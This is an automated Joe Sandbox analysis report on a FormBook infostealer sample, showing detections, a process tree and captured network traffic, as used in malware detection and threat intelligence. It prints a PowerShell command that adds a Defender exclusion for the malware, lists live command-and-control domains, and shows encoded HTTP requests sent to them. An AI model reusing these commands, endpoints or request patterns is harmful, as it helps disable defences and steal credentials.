Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zjf9D3oDifslon7.bat.exe

Overview

General Information

Sample name:Zjf9D3oDifslon7.bat.exe
Analysis ID:1633494
MD5:c959a11f044fb4eb38f4ec1306bc432e
SHA1:a84e4b5e2a86f777afa70420b35c8b423307c264
SHA256:ce0656d79699a86c7a59333646e0248408e03e9b8e157289fb8e04e520a251c3
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Zjf9D3oDifslon7.bat.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe" MD5: C959A11F044FB4EB38F4EC1306BC432E)
    • powershell.exe (PID: 4144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7296 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Zjf9D3oDifslon7.bat.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe" MD5: C959A11F044FB4EB38F4EC1306BC432E)
      • nS7xrGJCV5KYH1dhdb.exe (PID: 4908 cmdline: "C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\vr8pkxsoHYH.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • help.exe (PID: 7660 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • nS7xrGJCV5KYH1dhdb.exe (PID: 708 cmdline: "C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\cQzrcWPiGoM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7880 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ParentImage: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe, ParentProcessId: 5628, ParentProcessName: Zjf9D3oDifslon7.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ProcessId: 4144, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ParentImage: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe, ParentProcessId: 5628, ParentProcessName: Zjf9D3oDifslon7.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ProcessId: 4144, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ParentImage: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe, ParentProcessId: 5628, ParentProcessName: Zjf9D3oDifslon7.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ProcessId: 4144, ProcessName: powershell.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Zjf9D3oDifslon7.bat.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.warc.tech/eorp/?gN08=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfE88Fv4nukOvIqLad/EovZRIL3wftBPJ/RkKqYLxwUCYJbEAB5c18=&pV=72RL76oHAvira URL Cloud: Label: malware
                Source: http://www.9c555697-d77.cfd/amnq/?gN08=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX9kEaM12Et8jJTr2mMILOW6QCAyYh/xmDseHoWW+VL0/cDZ3IOU=&pV=72RL76oHAvira URL Cloud: Label: malware
                Source: http://www.urbagan.netAvira URL Cloud: Label: malware
                Source: http://www.9c555697-d77.cfd/amnq/Avira URL Cloud: Label: malware
                Source: http://www.urbagan.net/yas3/Avira URL Cloud: Label: malware
                Source: http://www.dresses-executive.sbs/iz5a/Avira URL Cloud: Label: malware
                Source: http://www.dresses-executive.sbs/iz5a/?gN08=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCzngVqzEyQfibiUBY4ZKHOA094TeMtDRNwzn40Y7CPVzx32CctPmQ=&pV=72RL76oHAvira URL Cloud: Label: malware
                Source: http://www.warc.tech/eorp/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Zjf9D3oDifslon7.bat.exeVirustotal: Detection: 50%Perma Link
                Source: Zjf9D3oDifslon7.bat.exeReversingLabs: Detection: 47%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: iWNI.pdb source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: wntdll.pdbUGP source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Zjf9D3oDifslon7.bat.exe, Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: iWNI.pdbSHA256 source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: help.pdbGCTL source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3722689846.000000000085F000.00000002.00000001.01000000.0000000A.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3722822138.000000000085F000.00000002.00000001.01000000.0000000A.sdmp
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5C3D0 FindFirstFileW,FindNextFileW,FindClose,12_2_02B5C3D0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then xor eax, eax12_2_02B49E10
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi12_2_02B4E064
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then mov ebx, 00000004h12_2_037904F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.quantumxr.xyz
                Source: DNS query: www.lingkungan.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.bigjoy.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 77.222.42.122 77.222.42.122
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /s7xs/?pV=72RL76oH&gN08=xcMJ8dHCBqmRN/v8A9X3SQFFEvK7hDYfq5HSOXvlsOwc7SqmLqODR0c7NEVchTWYh0j1Mb1wg8ygaKr+DeyKnNHuLw8PpkV609o2sUdqNXuPrOVuuXILkYLd4rwXbUWp6Pe3dUM= HTTP/1.1Host: www.paoginbcn.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /bd6u/?gN08=C699ZhSusvxhZ79sGIyx/jAntutNR/TTEg+UR4pbUkUSuK2bkyYOQkP8ElyXgHmB/M1sj/T1LBz/t4SesGYN4wrWcYFx/5ot68zGBTYlnDCNodr/RHqc1yG4bl8DqhV5GYXCq8Y=&pV=72RL76oH HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /amnq/?gN08=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX9kEaM12Et8jJTr2mMILOW6QCAyYh/xmDseHoWW+VL0/cDZ3IOU=&pV=72RL76oH HTTP/1.1Host: www.9c555697-d77.cfdAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /ra8c/?gN08=FCJW9xjil5qugBSRiQA6TYMmKzFBES9fh1uxvnoCRwKx+kuUdPq0TiEctR6JEKFXsUKvjlQG/5hIwT1d+q0j/1iCU9EUYGPtluDYV9c/WeuHT7HzSozXeQyK+r9G2hUiOZ5RK/g=&pV=72RL76oH HTTP/1.1Host: www.thefounder.ceoAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /1vho/?pV=72RL76oH&gN08=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMWQZhSKFgyEuJs5hCmkO4WxGTnVPOEQP+gLUT4VDuutPsgTWBpFU= HTTP/1.1Host: www.lingkungan.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /hb3t/?gN08=9KXb6qBxMll9f4x2p0s5tKTO97R+nUCdHsPBbbY6H5bX94ZOqhaq0szPM69Abc7OasYSx8zxfbGo3o80iaP4eapxmm2jqHmW9CxznwVLPhcW0VphUWXVjPpjgBZwM69FQ8Im0Qg=&pV=72RL76oH HTTP/1.1Host: www.nexstep.liveAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /tjx1/?gN08=TG2MQl+RzAjlK5FmB4vIzhZYom3se92/rpfSq0JUGMuU4ShRAQPdpLxTTwO0YSgd+qc50+/9J/dCy7dn7Bv3GHN+Sc3ELL+Y+schAQ9wC9Y5N/FY45eRx/Sf/SqUPO2TUMAOJOo=&pV=72RL76oH HTTP/1.1Host: www.031235045.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /freb/?gN08=CrVXR/tglfI2Tw26jNQpKKBtePCBpzNCR35NxdnTgAeIWyg43F22Hb45FwdJBD3fE3YCNnYYiArhrGggW044LgJePUXvimrIodKv/QpDNYxCPlVCAbLxc6DBc0KHQXoGeWWvXiA=&pV=72RL76oH HTTP/1.1Host: www.truay.siteAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /0zpa/?gN08=Arj7slIyYHdYIdItBvD/yug6zK1ulobzsX4Q/fC0Gb6wamVG7muUcu/e1DE+A+CXMGlNeQBc70XQmb9DcRsonO/yzonIKhXkXyWlnR1ezuUw/P1VmyAMkvhubLZRnfz8qNDWsf0=&pV=72RL76oH HTTP/1.1Host: www.playav.mobiAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /eorp/?gN08=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfE88Fv4nukOvIqLad/EovZRIL3wftBPJ/RkKqYLxwUCYJbEAB5c18=&pV=72RL76oH HTTP/1.1Host: www.warc.techAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /mik0/?gN08=MZodc8OlGt8s8YeqJAB5YyMn8PO8JKHrs5+7JFO7C2wIMEQuo0OiAGAhRRReq0xMS+0PcdUJklm1hYNxl2dPE9jey0yA/LIDuPPronUbycAnQT+gp2u2JsbLD0HUuGvMOevlVpE=&pV=72RL76oH HTTP/1.1Host: www.448828.partyAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /iz5a/?gN08=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCzngVqzEyQfibiUBY4ZKHOA094TeMtDRNwzn40Y7CPVzx32CctPmQ=&pV=72RL76oH HTTP/1.1Host: www.dresses-executive.sbsAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /7ao9/?gN08=0FCTgvFtttb/k3M7HElyhfE+VLi2VS+ZsM+qrGqWDjjgnBB1I9XqVJ2YzS96KRFB5ygIP+7H9rFjKFpZ8FUygo4h5wHS8QBwi4oSOvk4hrxITHeS+0VRJ/6NPUebi11PWq1CMfk=&pV=72RL76oH HTTP/1.1Host: www.bigjoy.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /vrgg/?gN08=0tsLL7PeGZ+MuFGr0RKEmyjy7iCQkNx0y+nhDKeS4rHoxyWsWUYtFIECofPisLkh7nEPrXMRdcFp7EDKjYXYHVCBDAfdhlQVF/DjaqRmnpXg6erSAq80yhVbSABIsdDrGDG/05Y=&pV=72RL76oH HTTP/1.1Host: www.klass.teamAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /1hc0/?gN08=qe5zJE97Y1Od+1YRU3JU1DJQ64YgQhmRIfUAmxXzD+vXbpn92cvHcFVamkgodqv0YEztxSYAbCj5dzR2TtR9T0MegKlWN5QKb4OsD7JjjXEag8dKVZvkZ7teEI5k/HsdiouyGcY=&pV=72RL76oH HTTP/1.1Host: www.calimade.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /yas3/?gN08=ACLzix20cds7up7/46wlnsk6Nsv7Q3fKxrYR6p4MvFRMrxvnqM2s8zT2fyP6MdeU99jzpRbWnk1TsskmEkSk+j1LVAgmvtiWZg0TZwKxPIDcWqBYoWhVQhoyMquNLa7w3FwOYUE=&pV=72RL76oH HTTP/1.1Host: www.urbagan.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /s7xs/?pV=72RL76oH&gN08=xcMJ8dHCBqmRN/v8A9X3SQFFEvK7hDYfq5HSOXvlsOwc7SqmLqODR0c7NEVchTWYh0j1Mb1wg8ygaKr+DeyKnNHuLw8PpkV609o2sUdqNXuPrOVuuXILkYLd4rwXbUWp6Pe3dUM= HTTP/1.1Host: www.paoginbcn.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficDNS traffic detected: DNS query: www.paoginbcn.net
                Source: global trafficDNS traffic detected: DNS query: www.quantumxr.xyz
                Source: global trafficDNS traffic detected: DNS query: www.9c555697-d77.cfd
                Source: global trafficDNS traffic detected: DNS query: www.thefounder.ceo
                Source: global trafficDNS traffic detected: DNS query: www.lingkungan.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nexstep.live
                Source: global trafficDNS traffic detected: DNS query: www.031235045.xyz
                Source: global trafficDNS traffic detected: DNS query: www.truay.site
                Source: global trafficDNS traffic detected: DNS query: www.playav.mobi
                Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                Source: global trafficDNS traffic detected: DNS query: www.448828.party
                Source: global trafficDNS traffic detected: DNS query: www.dresses-executive.sbs
                Source: global trafficDNS traffic detected: DNS query: www.bigjoy.xyz
                Source: global trafficDNS traffic detected: DNS query: www.klass.team
                Source: global trafficDNS traffic detected: DNS query: www.calimade.net
                Source: global trafficDNS traffic detected: DNS query: www.urbagan.net
                Source: unknownHTTP traffic detected: POST /bd6u/ HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.quantumxr.xyzReferer: http://www.quantumxr.xyz/bd6u/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50Data Raw: 67 4e 30 38 3d 50 34 56 64 61 58 69 6a 68 4b 55 4f 63 65 55 4d 58 70 37 44 37 43 70 6e 34 2b 78 65 51 71 2f 34 43 78 57 51 58 75 74 65 4c 33 6b 66 75 66 71 39 6e 51 46 64 4a 30 76 32 48 31 65 42 6f 47 4b 51 68 4f 52 6a 6a 4e 57 58 4e 6d 7a 38 67 70 6a 48 72 45 30 51 39 58 48 4b 62 59 30 76 30 75 67 4e 6d 2b 43 66 42 7a 77 4e 2b 41 79 4a 33 59 33 54 54 42 57 4e 37 67 32 4e 4b 56 38 72 74 43 6f 76 58 76 36 39 73 73 69 4c 50 49 36 72 63 6d 6a 45 39 2b 73 4e 50 35 2b 64 46 5a 73 41 72 69 75 59 69 46 76 71 5a 4b 35 76 33 39 6a 73 7a 71 7a 4b 55 62 66 6e 70 66 53 6b 4d 57 72 74 4a 57 